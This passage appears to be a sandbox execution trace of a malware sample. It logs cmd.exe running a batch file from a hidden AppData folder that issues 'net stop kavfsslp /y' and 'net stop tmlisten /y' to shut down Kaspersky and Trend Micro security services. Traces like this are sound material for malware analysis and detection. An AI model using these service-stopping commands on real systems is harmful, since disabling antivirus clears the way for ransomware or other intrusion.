lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xef2 [0204.673] GetProcessHeap () returned 0x3e0000 [0204.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0204.673] GetProcessHeap () returned 0x3e0000 [0204.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0204.673] GetProcessHeap () returned 0x3e0000 [0204.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0204.673] GetProcessHeap () returned 0x3e0000 [0204.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0204.673] GetProcessHeap () returned 0x3e0000 [0204.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0204.673] GetProcessHeap () returned 0x3e0000 [0204.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0204.673] GetProcessHeap () returned 0x3e0000 [0204.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0204.673] GetProcessHeap () returned 0x3e0000 [0204.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0204.673] GetProcessHeap () returned 0x3e0000 [0204.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0204.673] GetProcessHeap () returned 0x3e0000 [0204.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0204.673] GetProcessHeap () returned 0x3e0000 [0204.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0204.673] GetProcessHeap () returned 0x3e0000 [0204.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0204.673] GetProcessHeap () returned 0x3e0000 [0204.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0204.674] _get_osfhandle (_FileHandle=3) returned 0x78 [0204.674] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xef2 [0204.674] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x9cf, lpOverlapped=0x0) returned 1 [0204.674] SetFilePointer (in: hFile=0x78, lDistanceToMove=3848, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf08 [0204.674] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=22, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop kavfsslp /y\r\ntor /y\r\ny\r\n/y\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 22 [0204.674] _get_osfhandle (_FileHandle=3) returned 0x78 [0204.674] GetFileType (hFile=0x78) returned 0x1 [0204.674] _get_osfhandle (_FileHandle=3) returned 0x78 [0204.674] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf08 [0204.674] GetProcessHeap () returned 0x3e0000 [0204.674] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0204.674] GetProcessHeap () returned 0x3e0000 [0204.675] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0204.678] _tell (_FileHandle=3) returned 3848 [0204.678] _close (_FileHandle=3) returned 0 [0204.678] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0204.678] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0204.678] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0204.678] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0204.678] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0204.678] _wcsicmp (_String1="net", _String2="CD") returned 11 [0204.678] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0204.678] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0204.678] _wcsicmp (_String1="net", _String2="REN") returned -4 [0204.678] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0204.678] _wcsicmp (_String1="net", _String2="SET") returned -5 [0204.678] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0204.678] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0204.678] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0204.678] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0204.678] _wcsicmp (_String1="net", _String2="MD") returned 1 [0204.678] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0204.678] _wcsicmp (_String1="net", _String2="RD") returned -4 [0204.678] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0204.678] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0204.678] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0204.678] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0204.678] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0204.678] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0204.678] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0204.678] _wcsicmp (_String1="net", _String2="VER") returned -8 [0204.678] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0204.678] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0204.678] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0204.679] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0204.679] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0204.679] _wcsicmp (_String1="net", _String2="START") returned -5 [0204.679] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0204.679] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0204.679] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0204.679] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0204.679] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0204.679] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0204.679] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0204.679] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0204.679] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0204.679] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0204.679] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0204.679] SetErrorMode (uMode=0x0) returned 0x1 [0204.679] GetProcessHeap () returned 0x3e0000 [0204.679] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0204.679] GetProcessHeap () returned 0x3e0000 [0204.679] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0204.680] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0204.680] GetProcessHeap () returned 0x3e0000 [0204.680] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0204.680] GetProcessHeap () returned 0x3e0000 [0204.680] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0204.680] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0204.680] GetProcessHeap () returned 0x3e0000 [0204.680] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0204.680] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.680] GetProcessHeap () returned 0x3e0000 [0204.680] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0204.681] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0204.681] GetProcessHeap () returned 0x3e0000 [0204.681] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0204.681] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.681] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0204.682] GetLastError () returned 0x2 [0204.682] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0204.682] GetLastError () returned 0x2 [0204.682] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.683] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0204.683] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0204.683] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0204.683] GetLastError () returned 0x2 [0204.684] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0204.684] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0204.684] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.685] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0204.685] SetErrorMode (uMode=0x0) returned 0x1 [0204.685] GetProcessHeap () returned 0x3e0000 [0204.685] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0204.685] GetProcessHeap () returned 0x3e0000 [0204.685] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0204.685] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0204.685] GetProcessHeap () returned 0x3e0000 [0204.685] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0204.685] GetProcessHeap () returned 0x3e0000 [0204.685] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0204.686] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0204.686] GetProcessHeap () returned 0x3e0000 [0204.686] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0204.686] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.686] GetProcessHeap () returned 0x3e0000 [0204.686] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0204.686] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0204.686] GetProcessHeap () returned 0x3e0000 [0204.686] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0204.687] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.687] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0204.687] GetLastError () returned 0x2 [0204.687] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0204.688] GetLastError () returned 0x2 [0204.688] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.688] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0204.688] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0204.689] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0204.689] GetLastError () returned 0x2 [0204.689] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0204.689] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0204.690] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.690] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0204.690] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0204.690] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0204.691] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0204.691] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop kavfsslp /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop kavfsslp /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop kavfsslp /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x508, dwThreadId=0x74c)) returned 1 [0204.694] CloseHandle (hObject=0x78) returned 1 [0204.694] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0204.694] GetProcessHeap () returned 0x3e0000 [0204.695] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.695] GetEnvironmentStringsW () returned 0x3f8408* [0204.695] GetProcessHeap () returned 0x3e0000 [0204.695] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.695] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.695] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0204.832] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0204.832] CloseHandle (hObject=0x74) returned 1 [0204.832] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0204.832] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0204.833] GetProcessHeap () returned 0x3e0000 [0204.833] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.833] GetEnvironmentStringsW () returned 0x3f8408* [0204.833] GetProcessHeap () returned 0x3e0000 [0204.833] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.833] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.833] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0204.833] GetProcessHeap () returned 0x3e0000 [0204.833] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.833] GetEnvironmentStringsW () returned 0x3f8408* [0204.833] GetProcessHeap () returned 0x3e0000 [0204.833] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.833] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.833] GetProcessHeap () returned 0x3e0000 [0204.833] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0204.833] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0204.833] _get_osfhandle (_FileHandle=1) returned 0x264 [0204.833] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0204.834] _get_osfhandle (_FileHandle=1) returned 0x264 [0204.834] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0204.834] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0204.834] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0204.834] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0204.834] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0204.834] SetConsoleInputExeNameW () returned 0x1 [0204.834] GetConsoleOutputCP () returned 0x1b5 [0204.834] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0204.834] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0204.835] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0204.835] _get_osfhandle (_FileHandle=3) returned 0x74 [0204.835] SetFilePointer (in: hFile=0x74, lDistanceToMove=3848, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf08 [0204.835] GetProcessHeap () returned 0x3e0000 [0204.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0204.835] GetProcessHeap () returned 0x3e0000 [0204.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0204.835] GetProcessHeap () returned 0x3e0000 [0204.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0204.835] GetProcessHeap () returned 0x3e0000 [0204.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0204.835] GetProcessHeap () returned 0x3e0000 [0204.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0204.835] GetProcessHeap () returned 0x3e0000 [0204.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0204.835] GetProcessHeap () returned 0x3e0000 [0204.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0204.835] GetProcessHeap () returned 0x3e0000 [0204.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0204.835] GetProcessHeap () returned 0x3e0000 [0204.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0204.835] GetProcessHeap () returned 0x3e0000 [0204.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0204.835] GetProcessHeap () returned 0x3e0000 [0204.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0204.835] GetProcessHeap () returned 0x3e0000 [0204.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0204.835] GetProcessHeap () returned 0x3e0000 [0204.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0204.836] _get_osfhandle (_FileHandle=3) returned 0x74 [0204.836] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf08 [0204.836] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x9b9, lpOverlapped=0x0) returned 1 [0204.836] SetFilePointer (in: hFile=0x74, lDistanceToMove=3870, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf1e [0204.836] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=22, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop tmlisten /y\r\ntor /y\r\ny\r\n/y\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 22 [0204.836] _get_osfhandle (_FileHandle=3) returned 0x74 [0204.836] GetFileType (hFile=0x74) returned 0x1 [0204.836] _get_osfhandle (_FileHandle=3) returned 0x74 [0204.836] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf1e [0204.836] GetProcessHeap () returned 0x3e0000 [0204.836] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0204.836] GetProcessHeap () returned 0x3e0000 [0204.836] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0204.839] _tell (_FileHandle=3) returned 3870 [0204.840] _close (_FileHandle=3) returned 0 [0204.840] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0204.840] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0204.840] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0204.840] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0204.840] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0204.840] _wcsicmp (_String1="net", _String2="CD") returned 11 [0204.840] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0204.840] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0204.840] _wcsicmp (_String1="net", _String2="REN") returned -4 [0204.840] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0204.840] _wcsicmp (_String1="net", _String2="SET") returned -5 [0204.840] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0204.840] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0204.840] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0204.840] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0204.840] _wcsicmp (_String1="net", _String2="MD") returned 1 [0204.840] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0204.840] _wcsicmp (_String1="net", _String2="RD") returned -4 [0204.840] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0204.840] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0204.840] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0204.840] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0204.840] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0204.840] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0204.840] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0204.840] _wcsicmp (_String1="net", _String2="VER") returned -8 [0204.840] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0204.840] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0204.840] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0204.840] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0204.840] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0204.840] _wcsicmp (_String1="net", _String2="START") returned -5 [0204.840] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0204.840] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0204.840] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0204.840] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0204.840] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0204.841] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0204.841] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0204.841] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0204.841] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0204.841] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0204.841] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0204.841] SetErrorMode (uMode=0x0) returned 0x1 [0204.841] GetProcessHeap () returned 0x3e0000 [0204.841] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 